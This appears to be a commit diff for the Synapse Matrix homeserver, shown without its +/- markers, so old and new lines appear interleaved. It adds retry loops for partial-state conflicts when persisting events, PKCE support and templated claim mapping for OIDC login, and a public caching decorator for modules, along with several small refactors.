# Perform a user device resync for each user only once and only as long as:
# - they have an empty device_list
# - they are in some rooms that this server can see
users_to_resync_devices = {
user_id
for (user_id, device_list) in destination_query.items()
if (not device_list) and (await self.store.get_rooms_for_user(user_id))
}
room_ids = await self.store.get_rooms_for_user(user_id)
if not room_ids:
continue
logger.debug(
"%d users to resync devices for from destination %s",
len(users_to_resync_devices),
destination,
)
# We've decided we're sharing a room with this user and should
# probably be tracking their device lists. However, we haven't
# done an initial sync on the device list so we do it now.
try:
resync_results = (
await self.device_handler.device_list_updater.user_device_resync(
user_id
)
try:
user_resync_results = (
await self.device_handler.device_list_updater.multi_user_device_resync(
list(users_to_resync_devices)
)
)
for user_id in users_to_resync_devices:
resync_results = user_resync_results[user_id]
if resync_results is None:
raise ValueError("Device resync failed")
# TODO: It's weird that we'll store a failure against a
# destination, yet continue processing users from that
# destination.
# We might want to consider changing this, but for now
# I'm leaving it as I found it.
failures[destination] = _exception_to_failure(
ValueError(f"Device resync failed for {user_id!r}")
)
continue
# Add the device keys to the results.
user_devices = resync_results["devices"]
@ -339,8 +356,8 @@ class E2eKeysHandler:
if self_signing_key:
cross_signing_keys["self_signing_keys"][user_id] = self_signing_key
except Exception as e:
failures[destination] = _exception_to_failure(e)
except Exception as e:
failures[destination] = _exception_to_failure(e)
if len(destination_query) == len(user_ids_updated):
# We've updated all the users in the query and we do not need to

View File

@ -1343,32 +1343,53 @@ class FederationHandler:
)
EventValidator().validate_builder(builder, self.hs.config)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# Try several times, it could fail with PartialStateConflictError
# in send_membership_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
(
event,
context,
) = await self.event_creation_handler.create_new_client_event(
builder=builder
)
EventValidator().validate_new(event, self.config)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
EventValidator().validate_new(event, self.config)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying new third party invite %r because %s", event, e)
raise e
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
await self._check_signature(event, context)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(
event
)
except AuthError as e:
logger.warning(
"Denying new third party invite %r because %s", event, e
)
raise e
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
await self._check_signature(event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
else:
destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}
@ -1400,28 +1421,46 @@ class FederationHandler:
room_version_obj, event_dict
)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# Try several times, it could fail with PartialStateConflictError
# in send_membership_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
(
event,
context,
) = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(
event.sender
)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
async def add_display_name_to_third_party_invite(
self,

View File

@ -610,6 +610,8 @@ class FederationEventHandler:
self._state_storage_controller.notify_event_un_partial_stated(
event.event_id
)
# Notify that there's a new row in the un_partial_stated_events stream.
self._notifier.notify_replication()
@trace
async def backfill(
@ -1421,7 +1423,7 @@ class FederationEventHandler:
"""
try:
await self._store.mark_remote_user_device_cache_as_stale(sender)
await self._store.mark_remote_users_device_caches_as_stale((sender,))
# Immediately attempt a resync in the background
if self._config.worker.worker_app:

View File

@ -37,7 +37,6 @@ from synapse.api.errors import (
AuthError,
Codes,
ConsentNotGivenError,
LimitExceededError,
NotFoundError,
ShadowBanError,
SynapseError,
@ -1001,60 +1000,73 @@ class EventCreationHandler:
event.internal_metadata.stream_ordering,
)
event, context = await self.create_event(
requester,
event_dict,
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
outlier=outlier,
historical=historical,
depth=depth,
)
assert self.hs.is_mine_id(event.sender), "User must be our own: %s" % (
event.sender,
)
spam_check_result = await self.spam_checker.check_event_for_spam(event)
if spam_check_result != self.spam_checker.NOT_SPAM:
if isinstance(spam_check_result, tuple):
try:
[code, dict] = spam_check_result
raise SynapseError(
403,
"This message had been rejected as probable spam",
code,
dict,
)
except ValueError:
logger.error(
"Spam-check module returned invalid error value. Expecting [code, dict], got %s",
spam_check_result,
)
raise SynapseError(
403,
"This message has been rejected as probable spam",
Codes.FORBIDDEN,
)
# Backwards compatibility: if the return value is not an error code, it
# means the module returned an error message to be included in the
# SynapseError (which is now deprecated).
raise SynapseError(
403,
spam_check_result,
Codes.FORBIDDEN,
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.create_event(
requester,
event_dict,
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
outlier=outlier,
historical=historical,
depth=depth,
)
ev = await self.handle_new_client_event(
requester=requester,
events_and_context=[(event, context)],
ratelimit=ratelimit,
ignore_shadow_ban=ignore_shadow_ban,
)
assert self.hs.is_mine_id(event.sender), "User must be our own: %s" % (
event.sender,
)
spam_check_result = await self.spam_checker.check_event_for_spam(event)
if spam_check_result != self.spam_checker.NOT_SPAM:
if isinstance(spam_check_result, tuple):
try:
[code, dict] = spam_check_result
raise SynapseError(
403,
"This message had been rejected as probable spam",
code,
dict,
)
except ValueError:
logger.error(
"Spam-check module returned invalid error value. Expecting [code, dict], got %s",
spam_check_result,
)
raise SynapseError(
403,
"This message has been rejected as probable spam",
Codes.FORBIDDEN,
)
# Backwards compatibility: if the return value is not an error code, it
# means the module returned an error message to be included in the
# SynapseError (which is now deprecated).
raise SynapseError(
403,
spam_check_result,
Codes.FORBIDDEN,
)
ev = await self.handle_new_client_event(
requester=requester,
events_and_context=[(event, context)],
ratelimit=ratelimit,
ignore_shadow_ban=ignore_shadow_ban,
)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
# we know it was persisted, so must have a stream ordering
assert ev.internal_metadata.stream_ordering
@ -1363,7 +1375,7 @@ class EventCreationHandler:
Raises:
ShadowBanError if the requester has been shadow-banned.
SynapseError(503) if attempting to persist a partial state event in
PartialStateConflictError if attempting to persist a partial state event in
a room that has been un-partial stated.
"""
extra_users = extra_users or []
@ -1425,35 +1437,24 @@ class EventCreationHandler:
# We now persist the event (and update the cache in parallel, since we
# don't want to block on it).
event, context = events_and_context[0]
try:
result, _ = await make_deferred_yieldable(
gather_results(
(
run_in_background(
self._persist_events,
requester=requester,
events_and_context=events_and_context,
ratelimit=ratelimit,
extra_users=extra_users,
dont_notify=dont_notify,
),
run_in_background(
self.cache_joined_hosts_for_events, events_and_context
).addErrback(
log_failure, "cache_joined_hosts_for_event failed"
),
result, _ = await make_deferred_yieldable(
gather_results(
(
run_in_background(
self._persist_events,
requester=requester,
events_and_context=events_and_context,
ratelimit=ratelimit,
extra_users=extra_users,
dont_notify=dont_notify,
),
consumeErrors=True,
)
).addErrback(unwrapFirstError)
except PartialStateConflictError as e:
# The event context needs to be recomputed.
# Turn the error into a 429, as a hint to the client to try again.
logger.info(
"Room %s was un-partial stated while persisting client event.",
event.room_id,
run_in_background(
self.cache_joined_hosts_for_events, events_and_context
).addErrback(log_failure, "cache_joined_hosts_for_event failed"),
),
consumeErrors=True,
)
raise LimitExceededError(msg=e.msg, errcode=e.errcode, retry_after_ms=0)
).addErrback(unwrapFirstError)
return result
@ -2028,26 +2029,39 @@ class EventCreationHandler:
for user_id in members:
requester = create_requester(user_id, authenticated_entity=self.server_name)
try:
event, context = await self.create_event(
requester,
{
"type": EventTypes.Dummy,
"content": {},
"room_id": room_id,
"sender": user_id,
},
)
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.create_event(
requester,
{
"type": EventTypes.Dummy,
"content": {},
"room_id": room_id,
"sender": user_id,
},
)
event.internal_metadata.proactively_send = False
event.internal_metadata.proactively_send = False
# Since this is a dummy-event it is OK if it is sent by a
# shadow-banned user.
await self.handle_new_client_event(
requester,
events_and_context=[(event, context)],
ratelimit=False,
ignore_shadow_ban=True,
)
# Since this is a dummy-event it is OK if it is sent by a
# shadow-banned user.
await self.handle_new_client_event(
requester,
events_and_context=[(event, context)],
ratelimit=False,
ignore_shadow_ban=True,
)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
return True
except AuthError:
logger.info(

View File

@ -36,6 +36,7 @@ from authlib.jose import JsonWebToken, JWTClaims
from authlib.jose.errors import InvalidClaimError, JoseError, MissingClaimError
from authlib.oauth2.auth import ClientAuth
from authlib.oauth2.rfc6749.parameters import prepare_grant_uri
from authlib.oauth2.rfc7636.challenge import create_s256_code_challenge
from authlib.oidc.core import CodeIDToken, UserInfo
from authlib.oidc.discovery import OpenIDProviderMetadata, get_well_known_url
from jinja2 import Environment, Template
@ -475,6 +476,16 @@ class OidcProvider:
)
)
# If PKCE support is advertised ensure the wanted method is available.
if m.get("code_challenge_methods_supported") is not None:
m.validate_code_challenge_methods_supported()
if "S256" not in m["code_challenge_methods_supported"]:
raise ValueError(
'"S256" not in "code_challenge_methods_supported" ({supported!r})'.format(
supported=m["code_challenge_methods_supported"],
)
)
if m.get("response_types_supported") is not None:
m.validate_response_types_supported()
@ -602,6 +613,11 @@ class OidcProvider:
if self._config.jwks_uri:
metadata["jwks_uri"] = self._config.jwks_uri
if self._config.pkce_method == "always":
metadata["code_challenge_methods_supported"] = ["S256"]
elif self._config.pkce_method == "never":
metadata.pop("code_challenge_methods_supported", None)
self._validate_metadata(metadata)
return metadata
@ -653,7 +669,7 @@ class OidcProvider:
return jwk_set
async def _exchange_code(self, code: str) -> Token:
async def _exchange_code(self, code: str, code_verifier: str) -> Token:
"""Exchange an authorization code for a token.
This calls the ``token_endpoint`` with the authorization code we
@ -666,6 +682,7 @@ class OidcProvider:
Args:
code: The authorization code we got from the callback.
code_verifier: The PKCE code verifier to send, blank if unused.
Returns:
A dict containing various tokens.
@ -696,6 +713,8 @@ class OidcProvider:
"code": code,
"redirect_uri": self._callback_url,
}
if code_verifier:
args["code_verifier"] = code_verifier
body = urlencode(args, True)
# Fill the body/headers with credentials
@ -914,11 +933,14 @@ class OidcProvider:
- ``scope``: the list of scopes set in ``oidc_config.scopes``
- ``state``: a random string
- ``nonce``: a random string
- ``code_challenge``: a RFC7636 code challenge (if PKCE is supported)
In addition generating a redirect URL, we are setting a cookie with
a signed macaroon token containing the state, the nonce and the
client_redirect_url params. Those are then checked when the client
comes back from the provider.
In addition to generating a redirect URL, we are setting a cookie with
a signed macaroon token containing the state, the nonce, the
client_redirect_url, and (optionally) the code_verifier params. The state,
nonce, and client_redirect_url are then checked when the client comes back
from the provider. The code_verifier is passed back to the server during
the token exchange and compared to the code_challenge sent in this request.
Args:
request: the incoming request from the browser.
@ -935,10 +957,25 @@ class OidcProvider:
state = generate_token()
nonce = generate_token()
code_verifier = ""
if not client_redirect_url:
client_redirect_url = b""
metadata = await self.load_metadata()
# Automatically enable PKCE if it is supported.
extra_grant_values = {}
if metadata.get("code_challenge_methods_supported"):
code_verifier = generate_token(48)
# Note that we verified the server supports S256 earlier (in
# OidcProvider._validate_metadata).
extra_grant_values = {
"code_challenge_method": "S256",
"code_challenge": create_s256_code_challenge(code_verifier),
}
cookie = self._macaroon_generaton.generate_oidc_session_token(
state=state,
session_data=OidcSessionData(
@ -946,6 +983,7 @@ class OidcProvider:
nonce=nonce,
client_redirect_url=client_redirect_url.decode(),
ui_auth_session_id=ui_auth_session_id or "",
code_verifier=code_verifier,
),
)
@ -966,7 +1004,6 @@ class OidcProvider:
)
)
metadata = await self.load_metadata()
authorization_endpoint = metadata.get("authorization_endpoint")
return prepare_grant_uri(
authorization_endpoint,
@ -976,6 +1013,7 @@ class OidcProvider:
scope=self._scopes,
state=state,
nonce=nonce,
**extra_grant_values,
)
async def handle_oidc_callback(
@ -1003,7 +1041,9 @@ class OidcProvider:
# Exchange the code with the provider
try:
logger.debug("Exchanging OAuth2 code for a token")
token = await self._exchange_code(code)
token = await self._exchange_code(
code, code_verifier=session_data.code_verifier
)
except OidcError as e:
logger.warning("Could not exchange OAuth2 code: %s", e)
self._sso_handler.render_error(request, e.error, e.error_description)
@ -1520,8 +1560,8 @@ env.filters.update(
@attr.s(slots=True, frozen=True, auto_attribs=True)
class JinjaOidcMappingConfig:
subject_claim: str
picture_claim: str
subject_template: Template
picture_template: Template
localpart_template: Optional[Template]
display_name_template: Optional[Template]
email_template: Optional[Template]
@ -1540,8 +1580,23 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
@staticmethod
def parse_config(config: dict) -> JinjaOidcMappingConfig:
subject_claim = config.get("subject_claim", "sub")
picture_claim = config.get("picture_claim", "picture")
def parse_template_config_with_claim(
option_name: str, default_claim: str
) -> Template:
template_name = f"{option_name}_template"
template = config.get(template_name)
if not template:
# Convert the legacy subject_claim into a template.
claim = config.get(f"{option_name}_claim", default_claim)
template = "{{ user.%s }}" % (claim,)
try:
return env.from_string(template)
except Exception as e:
raise ConfigError("invalid jinja template", path=[template_name]) from e
subject_template = parse_template_config_with_claim("subject", "sub")
picture_template = parse_template_config_with_claim("picture", "picture")
def parse_template_config(option_name: str) -> Optional[Template]:
if option_name not in config:
@ -1574,8 +1629,8 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
raise ConfigError("must be a bool", path=["confirm_localpart"])
return JinjaOidcMappingConfig(
subject_claim=subject_claim,
picture_claim=picture_claim,
subject_template=subject_template,
picture_template=picture_template,
localpart_template=localpart_template,
display_name_template=display_name_template,
email_template=email_template,
@ -1584,7 +1639,7 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
)
def get_remote_user_id(self, userinfo: UserInfo) -> str:
return userinfo[self._config.subject_claim]
return self._config.subject_template.render(user=userinfo).strip()
async def map_user_attributes(
self, userinfo: UserInfo, token: Token, failures: int
@ -1615,7 +1670,7 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
if email:
emails.append(email)
picture = userinfo.get("picture")
picture = self._config.picture_template.render(user=userinfo).strip()
return UserAttributeDict(
localpart=localpart,

View File

@ -62,6 +62,7 @@ from synapse.events.utils import copy_and_fixup_power_levels_contents
from synapse.handlers.relations import BundledAggregations
from synapse.module_api import NOT_SPAM
from synapse.rest.admin._base import assert_user_is_admin
from synapse.storage.databases.main.events import PartialStateConflictError
from synapse.streams import EventSource
from synapse.types import (
JsonDict,
@ -207,46 +208,64 @@ class RoomCreationHandler:
new_room_id = self._generate_room_id()
# Check whether the user has the power level to carry out the upgrade.
# `check_auth_rules_from_context` will check that they are in the room and have
# the required power level to send the tombstone event.
(
tombstone_event,
tombstone_context,
) = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Tombstone,
"state_key": "",
"room_id": old_room_id,
"sender": user_id,
"content": {
"body": "This room has been replaced",
"replacement_room": new_room_id,
},
},
)
validate_event_for_room_version(tombstone_event)
await self._event_auth_handler.check_auth_rules_from_context(tombstone_event)
# Try several times, it could fail with PartialStateConflictError
# in _upgrade_room, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
# Check whether the user has the power level to carry out the upgrade.
# `check_auth_rules_from_context` will check that they are in the room and have
# the required power level to send the tombstone event.
(
tombstone_event,
tombstone_context,
) = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Tombstone,
"state_key": "",
"room_id": old_room_id,
"sender": user_id,
"content": {
"body": "This room has been replaced",
"replacement_room": new_room_id,
},
},
)
validate_event_for_room_version(tombstone_event)
await self._event_auth_handler.check_auth_rules_from_context(
tombstone_event
)
# Upgrade the room
#
# If this user has sent multiple upgrade requests for the same room
# and one of them is not complete yet, cache the response and
# return it to all subsequent requests
ret = await self._upgrade_response_cache.wrap(
(old_room_id, user_id),
self._upgrade_room,
requester,
old_room_id,
old_room, # args for _upgrade_room
new_room_id,
new_version,
tombstone_event,
tombstone_context,
)
# Upgrade the room
#
# If this user has sent multiple upgrade requests for the same room
# and one of them is not complete yet, cache the response and
# return it to all subsequent requests
ret = await self._upgrade_response_cache.wrap(
(old_room_id, user_id),
self._upgrade_room,
requester,
old_room_id,
old_room, # args for _upgrade_room
new_room_id,
new_version,
tombstone_event,
tombstone_context,
)
return ret
return ret
except PartialStateConflictError as e:
# Clean up the cache so we can retry properly
self._upgrade_response_cache.unset((old_room_id, user_id))
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
# This is to satisfy mypy and should never happen
raise PartialStateConflictError()
async def _upgrade_room(
self,

View File

@ -394,6 +394,8 @@ class RoomBatchHandler:
# Events are sorted by (topological_ordering, stream_ordering)
# where topological_ordering is just depth.
for (event, context) in reversed(events_to_persist):
# This call can't raise `PartialStateConflictError` since we forbid
# use of the historical batch API during partial state
await self.event_creation_handler.handle_new_client_event(
await self.create_requester_for_user_id_from_app_service(
event.sender, app_service_requester.app_service

View File

@ -34,6 +34,7 @@ from synapse.events.snapshot import EventContext
from synapse.handlers.profile import MAX_AVATAR_URL_LEN, MAX_DISPLAYNAME_LEN
from synapse.logging import opentracing
from synapse.module_api import NOT_SPAM
from synapse.storage.databases.main.events import PartialStateConflictError
from synapse.types import (
JsonDict,
Requester,
@ -392,60 +393,81 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):
event_pos = await self.store.get_position_for_event(existing_event_id)
return existing_event_id, event_pos.stream
event, context = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Member,
"content": content,
"room_id": room_id,
"sender": requester.user.to_string(),
"state_key": user_id,
# For backwards compatibility:
"membership": membership,
"origin_server_ts": origin_server_ts,
},
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
depth=depth,
require_consent=require_consent,
outlier=outlier,
historical=historical,
)
prev_state_ids = await context.get_prev_state_ids(
StateFilter.from_types([(EventTypes.Member, None)])
)
prev_member_event_id = prev_state_ids.get((EventTypes.Member, user_id), None)
if event.membership == Membership.JOIN:
newly_joined = True
if prev_member_event_id:
prev_member_event = await self.store.get_event(prev_member_event_id)
newly_joined = prev_member_event.membership != Membership.JOIN
# Only rate-limit if the user actually joined the room, otherwise we'll end
# up blocking profile updates.
if newly_joined and ratelimit:
await self._join_rate_limiter_local.ratelimit(requester)
await self._join_rate_per_room_limiter.ratelimit(
requester, key=room_id, update=False
# Try several times, it could fail with PartialStateConflictError,
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Member,
"content": content,
"room_id": room_id,
"sender": requester.user.to_string(),
"state_key": user_id,
# For backwards compatibility:
"membership": membership,
"origin_server_ts": origin_server_ts,
},
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
depth=depth,
require_consent=require_consent,
outlier=outlier,
historical=historical,
)
with opentracing.start_active_span("handle_new_client_event"):
result_event = await self.event_creation_handler.handle_new_client_event(
requester,
events_and_context=[(event, context)],
extra_users=[target],
ratelimit=ratelimit,
)
if event.membership == Membership.LEAVE:
if prev_member_event_id:
prev_member_event = await self.store.get_event(prev_member_event_id)
if prev_member_event.membership == Membership.JOIN:
await self._user_left_room(target, room_id)
prev_state_ids = await context.get_prev_state_ids(
StateFilter.from_types([(EventTypes.Member, None)])
)
prev_member_event_id = prev_state_ids.get(
(EventTypes.Member, user_id), None
)
if event.membership == Membership.JOIN:
newly_joined = True
if prev_member_event_id:
prev_member_event = await self.store.get_event(
prev_member_event_id
)
newly_joined = prev_member_event.membership != Membership.JOIN
# Only rate-limit if the user actually joined the room, otherwise we'll end
# up blocking profile updates.
if newly_joined and ratelimit:
await self._join_rate_limiter_local.ratelimit(requester)
await self._join_rate_per_room_limiter.ratelimit(
requester, key=room_id, update=False
)
with opentracing.start_active_span("handle_new_client_event"):
result_event = (
await self.event_creation_handler.handle_new_client_event(
requester,
events_and_context=[(event, context)],
extra_users=[target],
ratelimit=ratelimit,
)
)
if event.membership == Membership.LEAVE:
if prev_member_event_id:
prev_member_event = await self.store.get_event(
prev_member_event_id
)
if prev_member_event.membership == Membership.JOIN:
await self._user_left_room(target, room_id)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
# we know it was persisted, so should have a stream ordering
assert result_event.internal_metadata.stream_ordering
@ -1214,6 +1236,8 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):
ratelimit: Whether to rate limit this request.
Raises:
SynapseError if there was a problem changing the membership.
PartialStateConflictError: if attempting to persist a partial state event in
a room that has been un-partial stated.
"""
target_user = UserID.from_string(event.state_key)
room_id = event.room_id
@ -1843,21 +1867,37 @@ class RoomMemberMasterHandler(RoomMemberHandler):
list(previous_membership_event.auth_event_ids()) + prev_event_ids
)
event, context = await self.event_creation_handler.create_event(
requester,
event_dict,
txn_id=txn_id,
prev_event_ids=prev_event_ids,
auth_event_ids=auth_event_ids,
outlier=True,
)
event.internal_metadata.out_of_band_membership = True
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.event_creation_handler.create_event(
requester,
event_dict,
txn_id=txn_id,
prev_event_ids=prev_event_ids,
auth_event_ids=auth_event_ids,
outlier=True,
)
event.internal_metadata.out_of_band_membership = True
result_event = (
await self.event_creation_handler.handle_new_client_event(
requester,
events_and_context=[(event, context)],
extra_users=[UserID.from_string(target_user)],
)
)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
result_event = await self.event_creation_handler.handle_new_client_event(
requester,
events_and_context=[(event, context)],
extra_users=[UserID.from_string(target_user)],
)
# we know it was persisted, so must have a stream ordering
assert result_event.internal_metadata.stream_ordering

View File

@ -20,7 +20,6 @@ from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Set,
import attr
from synapse.api.constants import (
EventContentFields,
EventTypes,
HistoryVisibility,
JoinRules,
@ -701,13 +700,6 @@ class RoomSummaryHandler:
# there should always be an entry
assert stats is not None, "unable to retrieve stats for %s" % (room_id,)
current_state_ids = await self._storage_controllers.state.get_current_state_ids(
room_id
)
create_event = await self._store.get_event(
current_state_ids[(EventTypes.Create, "")]
)
entry = {
"room_id": stats["room_id"],
"name": stats["name"],
@ -720,7 +712,7 @@ class RoomSummaryHandler:
stats["history_visibility"] == HistoryVisibility.WORLD_READABLE
),
"guest_can_join": stats["guest_access"] == "can_join",
"room_type": create_event.content.get(EventContentFields.ROOM_TYPE),
"room_type": stats["room_type"],
}
if self._msc3266_enabled:
@ -730,7 +722,11 @@ class RoomSummaryHandler:
# Federation requests need to provide additional information so the
# requested server is able to filter the response appropriately.
if for_federation:
current_state_ids = (
await self._storage_controllers.state.get_current_state_ids(room_id)
)
room_version = await self._store.get_room_version(room_id)
if await self._event_auth_handler.has_restricted_join_rules(
current_state_ids, room_version
):

View File

@ -275,7 +275,7 @@ class SearchHandler:
)
room_ids = {r.room_id for r in rooms}
# If doing a subset of all rooms seearch, check if any of the rooms
# If doing a subset of all rooms search, check if any of the rooms
# are from an upgraded room, and search their contents as well
if search_filter.rooms:
historical_room_ids: List[str] = []

View File

@ -37,6 +37,7 @@ from synapse.api.presence import UserPresenceState
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS
from synapse.events import EventBase
from synapse.handlers.relations import BundledAggregations
from synapse.logging import issue9533_logger
from synapse.logging.context import current_context
from synapse.logging.opentracing import (
SynapseTags,
@ -1401,11 +1402,14 @@ class SyncHandler:
logger.debug("Fetching room data")
res = await self._generate_sync_entry_for_rooms(
(
newly_joined_rooms,
newly_joined_or_invited_or_knocked_users,
newly_left_rooms,
newly_left_users,
) = await self._generate_sync_entry_for_rooms(
sync_result_builder, account_data_by_room
)
newly_joined_rooms, newly_joined_or_invited_or_knocked_users, _, _ = res
_, _, newly_left_rooms, newly_left_users = res
block_all_presence_data = (
since_token is None and sync_config.filter_collection.blocks_all_presence()
@ -1622,13 +1626,18 @@ class SyncHandler:
}
)
logger.debug(
"Returning %d to-device messages between %d and %d (current token: %d)",
len(messages),
since_stream_id,
stream_id,
now_token.to_device_key,
)
if messages and issue9533_logger.isEnabledFor(logging.DEBUG):
issue9533_logger.debug(
"Returning to-device messages with stream_ids (%d, %d]; now: %d;"
" msgids: %s",
since_stream_id,
stream_id,
now_token.to_device_key,
[
message["content"].get(EventContentFields.TO_DEVICE_MSGID)
for message in messages
],
)
sync_result_builder.now_token = now_token.copy_and_replace(
StreamKeyType.TO_DEVICE, stream_id
)
@ -1782,6 +1791,7 @@ class SyncHandler:
- newly_left_rooms
- newly_left_users
"""
since_token = sync_result_builder.since_token
# 1. Start by fetching all ephemeral events in rooms we've joined (if required).

View File

@ -18,6 +18,7 @@ from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Dict,
Generator,
Iterable,
@ -126,7 +127,7 @@ from synapse.types import (
from synapse.types.state import StateFilter
from synapse.util import Clock
from synapse.util.async_helpers import maybe_awaitable
from synapse.util.caches.descriptors import CachedFunction, cached
from synapse.util.caches.descriptors import CachedFunction, cached as _cached
from synapse.util.frozenutils import freeze
if TYPE_CHECKING:
@ -136,6 +137,7 @@ if TYPE_CHECKING:
T = TypeVar("T")
P = ParamSpec("P")
F = TypeVar("F", bound=Callable[..., Any])
"""
This package defines the 'stable' API which can be used by extension modules which
@ -185,6 +187,42 @@ class UserIpAndAgent:
last_seen: int
def cached(
*,
max_entries: int = 1000,
num_args: Optional[int] = None,
uncached_args: Optional[Collection[str]] = None,
) -> Callable[[F], CachedFunction[F]]:
"""Returns a decorator that applies a memoizing cache around the function. This
decorator behaves similarly to functools.lru_cache.
Example:
@cached()
def foo('a', 'b'):
...
Added in Synapse v1.74.0.
Args:
max_entries: The maximum number of entries in the cache. If the cache is full
and a new entry is added, the least recently accessed entry will be evicted
from the cache.
num_args: The number of positional arguments (excluding `self`) to use as cache
keys. Defaults to all named args of the function.
uncached_args: A list of argument names to not use as the cache key. (`self` is
always ignored.) Cannot be used with num_args.
Returns:
A decorator that applies a memoizing cache around the function.
"""
return _cached(
max_entries=max_entries,
num_args=num_args,
uncached_args=uncached_args,
)
class ModuleApi:
"""A proxy object that gets passed to various plugin modules so they
can register new users etc if necessary.

View File

@ -26,10 +26,7 @@ def format_push_rules_for_user(
"""Converts a list of rawrules and a enabled map into nested dictionaries
to match the Matrix client-server format for push rules"""
rules: Dict[str, Dict[str, List[Dict[str, Any]]]] = {
"global": {},
"device": {},
}
rules: Dict[str, Dict[str, List[Dict[str, Any]]]] = {"global": {}}
rules["global"] = _add_empty_priority_class_arrays(rules["global"])

View File

@ -28,7 +28,7 @@ if TYPE_CHECKING:
logger = logging.getLogger(__name__)
class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
class ReplicationAddUserAccountDataRestServlet(ReplicationEndpoint):
"""Add user account data on the appropriate account data worker.
Request format:
@ -49,7 +49,6 @@ class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -73,7 +72,45 @@ class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
return 200, {"max_stream_id": max_stream_id}
class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
